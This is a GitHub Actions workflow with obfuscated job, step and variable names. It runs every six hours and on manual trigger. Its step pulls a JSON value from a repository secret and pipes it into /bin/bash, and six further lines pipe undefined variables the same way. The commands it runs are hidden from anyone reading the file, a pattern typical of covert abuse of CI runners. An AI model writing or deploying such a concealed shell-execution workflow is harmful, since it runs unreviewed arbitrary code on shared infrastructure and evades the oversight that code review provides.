name: xiebao19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '44 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiebao19871010
        env:
          juoon9914: ${{ secrets.juoon9914 }}
        run: |
          echo $juoon9914 | jq -r .fagfp2311 | /bin/bash
          echo $ej34175 | jq -r .o82506 | /bin/bash
          echo $kdi07 | jq -r .lqsht2 | /bin/bash
          echo $x87 | jq -r .v8 | /bin/bash
          echo $egf0 | jq -r .wrn4 | /bin/bash
          echo $i0 | jq -r .q89006 | /bin/bash
          echo $vyckz789 | jq -r .pup0 | /bin/bash

